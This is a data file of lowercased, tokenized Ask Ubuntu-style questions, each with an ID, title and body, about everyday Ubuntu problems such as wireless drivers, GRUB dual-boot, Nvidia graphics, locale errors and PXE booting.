426277	toolbar options not clickable	not really sure how to better describe this issue , but most options in the toolbar can not be selected or clicked upon and are darkened . it is not application specific , as it is present in almost every application . using ubuntu 13.10 . i would provide screenshots , but dropdown menus close when you press prtsc . update : the issue applies specifically to ubuntu , other installed desktop environments like lxde and gnome do not have a problem , but unity is my preferred environment for at home . could re-installing unity help ? if so , how do i do so safely ? i also attempted to reset unity with dconf reset -f /org/compiz/ no luck thus far ...
426279	xml : copy string of text from one element to another ?	thanks for helping . i 'm not a programmer , but i understand basic principles . i need to do this in a bunch of xml files . i 'm certain xpath pl or xtask or some combination using regex , could pull this off , but i 'm lost . does anyone have any ideas ? thanks ! here is the scope : copy the from the “scc_title” element to the “scc_comments” element . the scc_comments element is usually empty . if it is n't i still need it to append it to the current content . < property name= '' scc_title '' type= '' s '' > need to copy this text < /property > < property name= '' scc_comments '' type= '' s '' > and paste it here < /property >
426281	when i connect to the wi-fi , every other host in the `` near '' subnets can not use the internet	i use ubuntu 12.04 lts and i 've been experiencing the following problem recently . when i connect to the wi-fi network of the router a , the internet connection speed of every other host in that network slows down to 0.1-02 mbps , while my connection works properly - 20-25 mbps . then i connect to the router b which is a little far from a , then the all hosts ( but me ) of both a and b experience the same problem . i guess there are some problems related to wireless interference , but i 'm not sure , and i do n't know how to fix it . p.s : when i switch to windows 7 , everything works properly . edit : details of the wireless device : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 )
426286	13.10 : intel 6300-n wifi not detected | latitude e6320	i have 13.10 installed on my e6320 . it has the intel centrino ultimate-n 6300 802.11n network card . i can not for the life of me , figure out how to enable this card so that it is detected . i have tried using : $ lspci $ lspci | less $ lspci | grep -i eth it is nowhere to be found . wired works . where to start ? lspci -nn | grep 0280 02:00.0 network controller [ 0280 ] : intel corporation centrino ultimate-n 6300 [ 8086:422b ] ( rev 1a ) uname -a 3.11.0-17-generic # 31-ubuntu smp mon feb 3 21:52:43 utc 2014 x86_64 x86_64 gnu/linux iwconfig eth0 no wireless extensions . lo no wireless extensions . sudo lshw -c network *-network unclaimed description : network controller product : centrino ultimate-n 6300 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 1a width : 64 bits sudo modprobe iwlwifi returns nothing dmesg | grep iwl returns nothing
426288	problems with nvidia optimus secondary gpu in ubuntu 13.10	every time i try to run something in optimus mode i get a message like this : [ 277.250055 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 277.250091 ] [ error ] aborting because fallback start is disabled . there are some problems about the bars over the opened windows . they have different colorful patterns , which are simply annoying .
426292	ubuntu 13.04 fan noise	i 've installed ubuntu 13.04 along with windows 7 x64 , and its fan noise is unbearable ( no such noise when operating with windows 7 ) . here 's the laptop specs http : //h10025.www1.hp.com/ewfrf/wc/d ... name=c02993732 . it used to overheat with almost anything , so i followed this guide as many people said it 's probably that the hybrid gpu is n't supported well by the open-source drivers http : //xpressrazor.wordpress.com/201 ... -linux-ubuntu/ . currently i put the amd one on action rather than the integrated intel one , it 's much better than before but still it 's very bad relative to windows 7 . it produces loud noise with just browsing . another not so important issue , it has a black screen when it boots and does n't go away unless i press the increase illumination button ( once ) . if anyone has a recommendation for a fix that would make it operates like windows7 i would appreciate it . is ubuntu 's unity is the problem ? do i need another linux os other than ubuntu ? does everyone do this hassle to use ubuntu or this hardware issue is not common ?
426295	solved - no wireless on dell e7440 - intel corporation wireless 7260 ( rev 73 )	when i boot from usb , the wireless works great . however , when i install to a partition , the wireless does not appear in the network options . when i try to access network in the control panel , the program crashes every time . my wireless card is a intel 7260 and it appears when i run lspci .
426296	visualboyadvance battery has run dry	i recently downloaded vba and pokemon emerald . the game says `` the internal battery has run dry '' i 've been told to go to options > emulator > real time clock , but there is no clock ! i have checked everywhere and tried multiple other fixes , but nothing works !
426297	where do i report a ui issue that i do not like ?	i have just installed ubuntu , i am picky about ui design choices and have spotted something i do not like , but this time instead of just hating it i wish i could tell the ubuntu team so maybe just maybe someone in a future release might take 5 minutes to change it ... where do i report such an issue ? the issue in question is : i think the little arrow down and the labels next to it are too close to the edge . the arrow should be padded at least 5px and the label should be further from the arrow . when a whole list of such items shows up it looks real naff .
426300	how do i fix a white-screen glitch when exiting fullscreen mode in a video player ?	i 've had ubuntu 12.04 for a couple of weeks now , love it , but i 've come across one particularly problem that seems to keep happening . when watching a video , full-screen mode is ideal for me . often times when i press escape to get out of full-screen mode , my computer screen will go completely white . if i did n't pause the video while in full-screen mode , the video ( or at least its audio ) will keep playing . i ca n't seem to do anything about it and i ultimately have to manual restart ( physically holding down my keyboard power button ) to get out of that predicament . i was just wondering if there was any keyboard stroke to get out of this when it happens or any way to actually stop it from happening in the first place . also , my computer is a lenovo ideapad z500 touch laptop . thanks .
426301	ubuntu1 cloud photo button not displaying pics online .	when i click on the photo button from the dash on my ubuntu1 account , it says they are experiencing technical difficulties , come back later .
426302	how do i install alfred-json on ubuntu ?	is there a ppa for the packages , i need to use alfred on ubuntu ? i would like to analyse the freifunk batman mesh network in germany/kiel .
426304	laravel serves a phtml file	i tried running laravel php framework from my own custom folder ( not in '/var/www ' ) . i 've set up vhost , and permissions and it seems to work correctly , but instead of seeing the laravel welcome page , it offers my to download a phtml file . this post seems tobe relevant : http : //ubuntuforums.org/showthread.php ? t=1519645 # post_9539904 but i do n't have the /etc/apache2/mods-available/php5.conf file . am i on the right track here ? how can i fix this .
426307	clamd has no permissions to scan files in ubuntu 13.10	it seems that clamd has absolutely no rights to scan an single file on my server . disabling apparmor does not help . i 've tried both `` /etc/init.d/apparmor stop '' and `` /etc/init.d/apparmor teardown '' . i restarted clamd too ofcourse . the file permissions are ok ( i 'm testing on a world writable file ) . and no , using clamscan instead of clamdscan is not an option ... i 'm calling clamd via a python script ( using the pyclamd module ) . the result are identical when i scan the file via my script or via clamdscan . selinux is not installed ( i think ) . not sure how i can verify this on ubuntu 13.10 ...
426309	finding a disabled eth0 using lsmod	i have a lenovo x201 . i 'm trying to install ethernet on my ubuntu . when i use ifconfig ( or ifconfig -a ) , i ca n't find it . which means that it is not installed . which module is the eth0 ? $ lsmod module size used by wacom_w8001 13110 0 joydev 17693 0 snd_hda_codec_hdmi 32530 1 snd_hda_codec_conexant 62317 1 parport_pc 32866 0 ppdev 17113 0 rfcomm 47604 0 bnep 18281 2 bluetooth 180113 10 rfcomm , bnep arc4 12529 2 snd_hda_intel 33719 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq thinkpad_acpi 81819 0 nvram 14413 1 thinkpad_acpi wmi 19256 0 tpm_tis 18804 0 mac_hid 13253 0 snd 79041 17 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , s nd_rawmidi , snd_seq , snd_timer , snd_seq_device , thinkpad_acpi iwlwifi 401033 0 i915 478556 8 mac80211 506862 1 iwlwifi drm_kms_helper 46978 1 i915 drm 241971 4 i915 , drm_kms_helper serport 12936 1 psmouse 97519 0 cfg80211 205774 2 iwlwifi , mac80211 serio_raw 13211 0 uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mei 41616 0 intel_ips 18174 0 lp 17799 0 i2c_algo_bit 13423 1 i915 video 19651 1 i915 parport 46562 3 parport_pc , ppdev , lp e1000e 156873 0
426310	choice screen not displaying	i installed 12.04 via windows installer but not getting choice screen on boot . just goes straight into windows ( xp profesional sp3 )
426321	how do you disable trackpad and enable trackpoint on lenovo l430 running 13.10 ?	i have tried most stuff i have found listed on the internet , to try to disable the trackpad but keep the trackpoint working on my lenovo l430 . has any-one any ideas on how to do this ? funnily enough neither show up in xinput : $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ integrated camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=12 [ slave keyboard ( 3 ) ]
426326	how to change firefox debugger font size	it 's too little to read . bug report is https : //bugzilla.mozilla.org/show_bug.cgi ? id=143119 notice : it 's not about firebug .
426330	how do i reset/fix the winetricks gui ?	one day i was messing around in wine to try to install a few windows components . for some reason , winetricks has now completely shrunken the area of the window where i can select what i want to do and i ca n't do anything in it now . i know it 's possible to do winetricks stuff through command line , but i 'd prefer a gui when available . here 's a screenshot of what i mean . the choices used to have a bit of space , but now it 's just shrunken to the point where nothing is choose-able , because now it 's just a white line . i 've already tried uninstalling and reinstalling winetricks , but no dice ...
426331	ca n't enable bluetooth on my hp dv6	i was trying to activate my bluetooth adaptor by going to pc setting , the i swith that button to activate and nothing happens , it says that bluetooth still deactivated a little bit down . sorry if i ca n't explain exactly what happens , i am very new to ubuntu and english is not my strong point . i have tried to install blueman , but when i launch it says that i need to deactivate bluetooth first . strange .
426334	making a specific root folder accessible to user	i am using virtual box with ubuntu as the guest , which has a feature to share a folder between the host and guest , which is located for the guest in the media folder under root . it is quite troublesome to sudo every time to perform any action on it . i respect sudo and would like to keep root away from the user , however , is there a way to give user access to a particular root folder without sudo'ing ' all the time ?
426335	how do i stop the networkmanager in ubuntu 13.10 ?	i tried as root service network-manager stop and /etc/init.d/network-manager stop but that doese n't exist . and : killall networkmanager but it seems to restart immediately . how do i stop it ? ? ? edit : i filed a new question that describes more , what my problem is : how do i stop the networkmanager in ubuntu 13.10 without using the service command ?
426340	problem with characters encoding in bash in 12.04 new install ?	i just installed ubuntu 12.04.4 64 bits , all seemed to be ok , when i started to work on console i noticed : that i could n't get some accented characters typed in to the console , for example , if i tried to type ăš i would get a ? that neither a ls or any other unix commands output would display such characters properly . ansix3.4-1968 appeared as default character encoding in terminal , so : i changed the character encoding to utf-8 at set character encoding option in terminal menu . i can type these special characters properly but ca n't get other commands to output in a correct way . and i have to change this every time i open a new console . when i install anything i see this among the outputs and log info : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_time = `` es_mx.utf-8 '' , lc_monetary = `` es_mx.utf-8 '' , lc_address = `` es_mx.utf-8 '' , lc_telephone = `` es_mx.utf-8 '' , lc_name = `` es_mx.utf-8 '' , lc_measurement = `` es_mx.utf-8 '' , lc_identification = `` es_mx.utf-8 '' , lc_numeric = `` es_mx.utf-8 '' , lc_paper = `` es_mx.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_all to default locale : no such file or directory also if i do a typo at any command working from console i get : sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.2.44 my settings at install were only english language and spanish keyboard layout . what could it have happened ? and how can i fix it permanently ?
426342	how do i guard ubuntu for power outage ?	i develop industrial equipment with embedded pc and ubuntu 12.04.3 . web server ( apache ) and db ( sqlite ) running automatically when i turn on this pc . user ca n't shutdown in the correct sequence . because this pc has no display , keyboard , pointing device . user has to pull power line for shutdown . however , this process has the potential to crash ubuntu . i would like to build a system that will restart automatically after power outage . what could i do ? thanks in advance .
426344	not getting into grub anymore after running boot-repair	i 've had a dual boot of windows 7 and ubuntu 12.10 ( quantal quetzal ) on my notebook for quite a while and today when i started it i got into grub rescue instead of the regular grub menu and i could n't boot any of my 2 operating systems . i came onto boot-repair in the help section of ubuntu ( https : //help.ubuntu.com/community/boot-repair ) . so i created a live-usb of ubuntu 12.10 and followed the instruction to get boot-repair and run it and it ran succesfully and told me to reboot . now my problem is : after doing this boot-repair , whenever i start my notebook i do n't get into grub anymore but it just automatically boots my windows 7 , so i do n't know how to get on my ubuntu anymore . could someone please give me instructions on how to get back the grub menu when i start my notebook so i can just choose what operating system i would like to boot ? edit : boot-repair log - http : //paste.ubuntu.com/6997243/
426345	partition magic usb creation on ubuntu	i want to create a partition magic bootable usb , but i do n't have the necessary software to do this . i tried startup disk creator but the program ca n't open the partition magic iso .
426346	can not install nvidia drivers on ubuntu studio	i downloaded nvidia-linux-x86_64-331.49.run within terminal cd downloads sudo su sh nvidia-linux-x86_64-331.49.run it gives me the following http : //i.imgur.com/a9w1brb.png a quick google search later reveals i need to type sudo stop lightdm to shut off my x server . once i type in said command , i get a black screen . i have read that booting from single user mode from grub may get this working , though i could not do so given the instructions i found . i 'm terribly lost now . advice/suggestions ? thank you .
426348	ubuntu 13.10 and window bar artifacts	i 've tried to install that 'infamous ' 311 nvidia update and now i have my windows look like this . my graphic card is nvidia 710m . probably with no drivers currently ( i ca n't find any stable version , always a black screen ) .
426350	aftershot not loading ( fully )	i installed aftershot pro ( x64 ) on my ubuntu 13.10 64bit system but it is not loading ( fully ) . the installation was without any problem . it does load and show me two initial screens . 1st : choose folder location for settings & catalog 2nd : continue trial version or enter serial . once i click continue , a splash screen appears for split second and then it unloads every time . note : i do have ia32-libs and yes , i downloaded it from official website . what could be the problem here ? please help me out ...
426351	unable to download skype	each time i try to install skype from software center , an error about archive management or this comes up .
426352	very slow sdxc card read/writes	recently took my laptop which had windows 7 on it and did a fresh install of ubuntu 12.04.4 64 bit . the laptop has a 128gb class 10 kingston sdxc card installed . i used the card in windows without any issues ( card was exfat formatted , 256 bit bit-locker encrypted ) , i got write speeds of around 10 mb/s and read speeds as high as 25 mb/s . the laptop is an hp elitebook 8460p . after the move to ubuntu , i formatted the card as ext4 with encryption enabled using disk utility . however , i get very very slow write rates to the sd card . transferring 9.7 gb/s of .mp3 's took around an 1 hour 13 minutes ! is there some extra configuration needed to speed up the sd card ? or is luks encryption really this slow on certain media ? while the card is unformatted , disk utilities read/write benchmark reports an average write rate of 1.1 mb/s and a read rate of 10.5 mb/s ! seems like a hardware issue , except this same card and laptop performed so much better while using windows . any help would be greatly appreciated .
426354	i installed linux 12.04 and when i login the desktop is frozen	hi i recently installed linux ubuntu 12.04 via wubi . i did everything correctly and when the boot screen loads up i select ubuntu and it shows the log in screen and i log in to my account and once i 'm logged in i can see my desktop but i cant see the task bar where it shows the time and battery etc . and my mouse . also the screen is frozen and i ca n't control nor do anything . here our my specs below windows 7 64 bit 6gbs of ddr2 ram nvidia geforce 620 2 gbs amd athlon ii x2 235e dual core with 750gbs on hard drive c : and 500gb on hard drive b : please help i would love to use ubuntu . thanks * edit edit * i just installed ubuntu and the whole desktop is frozen i can not move or open or do anything it is completely frozen*
426355	ubuntu virtual machine not starting up in virtualbox	when i start up my ubuntu virtual machine in virtualbox , it gives me an error , and it says : the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . and it gives me one option : ok when i click ok , it gives me another prompt that is like this : what would you like to do ? ◉ run in low-graphics mode for just one session ○ reconfigure graphics ○ troubleshoot the error ○ exit to console login cancel ok i click ok , and then it says : stand by one minute while the display restarts ... ok in that prompt , it shows me a full loading bar . i clicked ok , and then it gives me a terminal-like area , which says : * checking battery state ... [ ok ] and it has a flashing _ as if it wants me to type something in ... anyone know whats going on ? note : every prompt is an ubuntu-like window , but not on my desktop , except for the terminal-like prompt , which is not on my desktop , and not an ubuntu-like window edit i 've tried to login with tty1 through tty6 , and when i type startx , it gives me a black screen ... but in tty1 instead of letting me type startx , it says this : ubuntu 12.04.4 lts ryan-virtualbox tty1 ryan-virtualbox login : * stopping system v runlevel compatibility [ ok ] maybe this has something to do with it ? ? ? note : i logged in to tty1 , and typed startx , but it opened the same black window ...
426360	how to activate alt+tab function and grab copied text on remote pc by remote desktop viewer ?	i have a problem when i want to switch windows on remote pc . when i press alt + tab , it switched windows opened on my pc , not in remote pc . how can i send or activate alt + tab on remote pc ( server ) ? and how to grab copied clipboard on remote pc to be pasted on local pc ?
426361	automate dvd ripping to one file being *.mp4 and another *.mp3	g'day guys , i have at our church a dvd burner that records the service and then spits it out after i finalize it . now what i do currently is ... step 1 : insert the dvd into my laptop , and use handbrake to rip the dvd to .mp4 and then save that in a folder structure like this : ext hdd = /frcmn/2014/2 feb/23rd/am/ obviously the month and the date changes most regularly . step 2 : using dvd studio free software extract ( or copy ) the .mp3 from the .mp4 and place that in : ext hdd = /frcmn/2014/2 feb/23rd/am/mp3 step 3 : copy as many requests for dvd 's ( for audio & video ) or cd 's ( audio only ) as required . now my question is this , is there a linux method that can automate this for me ? i 'm thinking that if i setup a computer with 2 dvd-rom 's and insert into each the newly made dvd it can take care of this process for me and so all i 'm left with is the extracted *.mp4 and *.mp3 ? ? thanks in advance steve
426362	which ubuntu server should we setup for the office ?	let 's say we are a medium sized company ( aim for 50-150 people ) . we want to be able to setup a ubuntu server with : email server file sharing share printer vpn firewall ( optional ) cloud ? ( wonder what you can do with it ) what hardware and software do we need and how should we approach it ? i am sure someone has done it before and want to know how it is usually setup . any expert can advice ? tyia .
426364	how to set up a screensaver in 13.10	i was wondering if there 's any sort of package or something i could install in ubuntu 13.10 to allow a graphical screensaver . i really do not like the blank black screen when the display turns off . i prefer abstract/colorful/exciting things over complete blackness . it reminds me of night which i think is bleak and boring . so any advice would be nice . thanks
426366	13.10 no dolby digital or dts passthrough with xmbc	i am new ubuntu user trying to get my feet wet as i am an avid windows user especially in my job . i have a lenovo h520s with the intel g640 processor and built in audio . i am having a problem with getting dolby digital and dts to work properly in xbmc . when xbmc has the 2 options enabled playback becomes choppy and no sound . but when i turn off the 2 and only have the multi channel lpcm enabled it works fine . i do not want to settle for this as the 5.1 sound is really not as good as it can be . i have read through many posts and can not seem to find an answer that fits . i am not sure where the issue is , ubuntu or xbmc . all i know is windows works as need be but xbmc tend to be a bit buggy in windows which is why i am trying linux . any thoughts or ideas or help would be appreciated . please keep in mind that i do n't know linux like i know windows and there fore you need to be detailed . thank you !
426367	installing lubuntu 12.04 on a mac g4 powerbook	i recently got 3 powerbooks from a friend of mine , only one of which i intend on using . i installed lubuntu dual boot with osx and restarted . when the powerbook restarts , i hear the beep , and then i see a gray screen with a box in the middle that has a question mark in it . one second later , the box changes to the finder icon , and osx boots up . can anyone tell me what i need to do to boot to lubuntu and restore the grub menu ? ( i assume that is what lubuntu uses , i use ubuntu for my main computer so i am unfamiliar with other ubuntu distros . ) the powerbook i am using , powerbook g4 2004 15 '' aluminum 1.33 ghz powerpc cpu 512 mb sdram ( will add more soon ) osx : 10.3.9 lubuntu 12.04 powerpc version
426369	ethernet ( eth0 ) not installed properly	i can not see eth0 , so i used lsmod to find the modem which in my case is called ( e1000e ) . i used dmesg | grep e1000e to see if it was installed properly and it gave me this : thinkpad-x201-tablet : ~ $ dmesg | grep e1000e [ 2.454606 ] e1000e : intel ( r ) pro/1000 network driver - 1.5.1-k [ 2.454611 ] e1000e : copyright ( c ) 1999 - 2011 intel corporation . [ 2.454659 ] e1000e 0000:00:19.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 [ 2.454674 ] e1000e 0000:00:19.0 : setting latency timer to 64 [ 2.454835 ] e1000e 0000:00:19.0 : irq 41 for msi/msi-x [ 2.465780 ] e1000e 0000:00:19.0 : pci int a disabled [ 2.465793 ] e1000e : probe of 0000:00:19.0 failed with error -3 concluding that it is n't installed properly . my question is how do i install this modem as eth0 ?
426374	adding grub2 menu entry , error : invalid filesystem ?	so i am in a long-winded attempt to set up an ubuntu/windows8 dual boot . after running boot repair , there are 2 ubuntu entries ( one is a recovery ) , 4 windows recovery entries , and a regular windows entry . the latter gives my an unknown command : drivemap , error : invalid efi filepath browsing multiple other forums has led me to add menuentry `` windows 8 '' { insmod part_gpt insmod chain set root= ' ( hd1 , gpt4 ) ' chainloader /efi/microsoft/boot/bootmgfw.efi } to my /etc/grub.d/40_custom in order to add a working entry . the new entry gives me an invalid filesystem error . the windows partition i 'm looking for is either sdb5 or sdb9 ( one is windows 8 , the other is ubuntu ) i 'm not sure which . any sugestions to fix either entry ? i got this computer last week and i 've been trying to get a dual boot running since then . i can access both windows 8 and ubuntu by switching the boot priority in my bios settings , but i 'd like to access them through grub .
426377	programming java on ubuntu 13.10	i have ubuntu 13.10 and i am trying to use a disk that contains a book , how to program java , 7th edition . it is the linux version cd and i ca n't figure out what program to use so i can look at the files on it . all of the files are in .class format . i have used the windows version on another pc and it seems to work fine with jgrasp , is there something else i should be using to edit and create java programs with the .class extension ?
426382	live boot from partition of usb ( or just do n't use up whole usb )	is there a way to create a bootable usb stick that does n't take up the whole disk ? i have a 16gb usb but would like to also have some music on it . can it be partitioned or something ?
426383	empathy account manager `` crashes ''	i use empathy only for my gtalk account . but recently i can not open the account manager window ( f4 ) . it does open , loading a little while but when loaded the information it shuts . i have read quite a few forums and the bug reports and seems like it is due to some extra parameter google included in the profile that the account manager can not parse ( or something like that anyway.. ) i have run empathy from console and this is the error i get when account manager closes : error : empathy-contact-widget.c:402 : contact_widget_details_update_edit : assertion failed : ( spec ! = null ) is there any way to fix this ? i have tried the suggestion from other question here to delete keys from gnome2/keyrings and delete empathy config , it did n't help . also are there any plugins for empathy ? i find the basic functionality very limited . i used pidgin before but it had some downsides as well . i can not believe there is n't any nice looking , well developed im client for ubuntu ?
426384	pxe boot recent ubuntu live cds	i 've been having trouble with recent ubuntu live cds trying to boot off of them via pxe . my ultimate goal is to rebuild an old ubuntu 9.04 diskless box using the newer ubuntu 12.04.4 build . when trying to boot what i believe is a good configuration , i 'm getting output similar to the following : loading ... /vmlinuz ... ... // -- - lotsa good boot-up stuff -- - begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/casper-premount ... [ 6.336295 ] pcnet32 0000:02:01.0 : eth0 : link up done . done . ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 2 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 3 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 4 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 6 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 9 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 16 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 25 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 36 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp ip-config : no response after 64 secs - giving up ip-config : eth0 hardware address xx : xx : xx : xx : xx : xx mtu 1500 dhcp rarp i originally followed the steps here . i currently have the following : a router running tomato 1.21 ( yes , i know it 's old ) a box containing the tftp server and the files from the live cd ( ip address 192.168.x.y ) the router has a dnsmasq custom configuration containing the following lines shown below : dhcp-no-override dhcp-boot=pxelinux.0 , ,192.168.x.y with these set up , when i want to add something new to my pxe collection , i put some files in certain places , add lines to certain config files , and then i 'm ready to boot my target box . i 've done this in the past for several boot situations including : backtrack 4r2 i386 debian lenny , squeeze , and wheezy damn small linux fedora 18 several older ubuntu live cds several older ubuntu installations my current process to add a new ubuntu live cd into the mix is as follows : mount the live cd as an iso image . copy all files out of the iso image onto the hard drive . copy the vmlinuz and initrd.lz files from the iso contents to area accessible by the tftp server . rebuild the initrd.lz to support pxe booting by modifying initramfs.conf and then running update-initramfs inside chroot : modules=netboot boot=nfs nfsroot=192.168.x.y : /path/to/extracted/iso/contents device=eth0 // did n't do this before , trying now as described here due to trouble but still no dice ; only have single nic anyway add item to boot.txt in tftp server . add lines to file under pxelinux.cfg directory . once i do these , i can reboot . to try it out , i 've been using a basic vmware player virtual machine with no hard drive , no cd-rom drive , and no floppy drive . all it does is boot from pxe . in the past , this has worked wonderfully , and then i can power it down and boot my desired physical box via pxe the same way . i have n't been able to boot the last couple ubuntu live cds this way because i get the message as shown above : no response after xx secs - giving up` message finally , i mounted the iso directly under my vmware vm and installed ubuntu directly onto a vm . once i had that , i made it a diskless image by mounting the hard drive and copying the contents out similar to steps 1 and 2 above , and then trying to pxe-boot from there . this has worked before ; however , when i try to do this with my 12.04 installation , i see the same symptom as my 12.04 live cd : no response after xx secs - giving up i tried this ; it did n't work . here are my old and new pxelinux.cfg/default lines : label ubuntu_12.04.4-desktop-i386 kernel /ubuntu/12.04.4-desktop-i386/vmlinuz nosplash # append boot=casper netboot=nfs nfsroot=192.168.0.99 : /path/to/ubuntu-12.04.4-desktop-i386 initrd=/ubuntu/12.04.4-desktop-i386/initrd.lz append boot=nfs root=/dev/nfs nfsroot=192.168.0.99 : /path/to/ubuntu-12.04.4-desktop-i386 initrd=/ubuntu/12.04.4-desktop-i386/initrd.lz i would appreciate any insight anyone has . thanks .
426389	fn key & left ctrl key have been swapped ! ubuntu 13.10 & lenovo l430	for a while i thought the left ctrl key on this installation was n't working , then i just realized that the fn key is performing all the left ctrl functions . the left ctrl though does not perform all the fn key functions . left ctrl + f3 does lock the system , the rest do n't seem to be working , also the brightness control ( f8 & f9 ) work where do i get started ?
426390	how to install django framework on ubuntu 12.10 ?	i am new to ubuntu . can some one help me how to install django framework and where to write python script ?
426392	ubuntu 13.10 screen resolution issue on laptop	i am a new user , and beginner of linux . my laptop screen resolution is 1200x800 . but after installing 13.10 , it is showing in 800x600 resolution i think . and it is also not appearing in full screen when using ctrl+f . how do i overcome this ?
426393	ubuntu wireless only connects to some networks	i have dual-booted my windows 8 machine with ubuntu . no matter which version of ubuntu i had installed , i was able to connect to my home network on both windows and ubuntu , but when i got to school only windows connected . i 'm not sure if it 's relevant , but i was indeed able to connect via ethernet at school . whenever i put in the password for either of our school networks ( i 've triple checked , they are definitely correct ) it tries to connect and just prompts me for a password again after 5 minutes . what should i do ? ( i have seen similar questions around but never any definite or successful responses )
426395	no monitor 12.04 lts change resolution vnc	i have a box , that runs ubuntu 12.04 . i connect it with a vnc client . it always go down to the default resolution because i do n't have a monitor connected . is there any way i can change the resolution to like 1440x990 ? thanks
426396	how to duplicate a customized installation of ubuntu so it can be installed as if it was a customized distribution ?	i use ubuntu server and i have ways of managing it efficiently . for example , i use lxde desktop to control lvm and a few other things that are annoyingly easy to get wrong when using the command-line , despite the fact i mainly use the command-line for everything anyway . when you have only got one pc that has only 4gb ram it is only viable for one virtual machine to run at any given time , and when you make a mistake in the configuration of multiple servers such as lamp , mail server , etc. , the only way to fix the misconfiguration , the way i normally look at it , is to completely reinstall ubuntu . now you have an idea about roughly what i hope to achieve , bearing in mind that to start off with it will be only basics and the server software will only come into the picture when i can get the configuration right . is it possible , and how , to clone a configured installation of ubuntu so it can be made installable on other computers , but allowing preinstallation partitioning and network configurations . by `` other computers '' i mean cloning the pre-existing ubuntu installation to as few as one computer or else to multiple computers . any advice would be greatly appreciated .
426399	i did not enter a pwd for me that is 6 digits long , and my pwd does not work	i am new to ubuntu ( or linux ) . i installed version 13.10 and had the disk encrypted and used a 16 digit long pwd . the pwd for my login name is 10 digits long . when i tried to update the software , it asked me to authinacate and indicated the pwd to be just 6 digits long . no where in the install process did it ask for su pwd . in user accounts i am an administrator and that is where it wants a 6 digit pwd . how can i change this or do i need to reinstall ? ? thanks for any help
426400	failed to download ubuntu one	i am trying to install ubuntu one but here showing an error message . i 've no idea what does it mean and how to handle it . anybody please help me .
426405	only keep recent emails in claws mail ( or any light weight mail client )	since i 'm using a netbook with only 16gb ssd , i want to use most lightweight client possible ( hence not thunderbird ) however , i was n't able to find an option to download only recent mails , say , more recent than a week , in claws mail . is there a way to turn this on ? if claws mail does not have it , does any lightweight mail client have it ? on a related note , how may i see the space that all my mails are occupying ?
426406	sql anywhere , ubuntu 12.04 x86	i need to make a server in my company . img of my mnc has refused to provide any help on linux systems , hence i need to do it without any help . i tried : ⠀ubuntu 13.10 x86 , sql anywhere ( 12-16 ) both linux and windows setup ( used wine ) ⠀ubuntu 11.10 x86 , sql anywhere ( 12-16 ) both linux and windows setup ( used wine ) ⠀ubuntu 12.04 x86 , sql anywhere ( 12-16 ) both linux and windows setup ( used wine ) if i 'm using a linux setup and open using scjview , it is showing libjys -- -- .r.so and etc . error , and i 'm not able to make ultralite database or any plugin though sql is running . whereas in case i 'm using wine to use the windows setup for sql , it shows 5 errors , all plugin errors mlpulguin , ulpluginm , etc. , and can not see any plugin in sql . hence i 'm in deep trouble . i tried both versions of sql anywhere ( the client as well as the server one ) . i wish to know : has someone done it before ? if you have , i need to know exactly the way of getting it done .
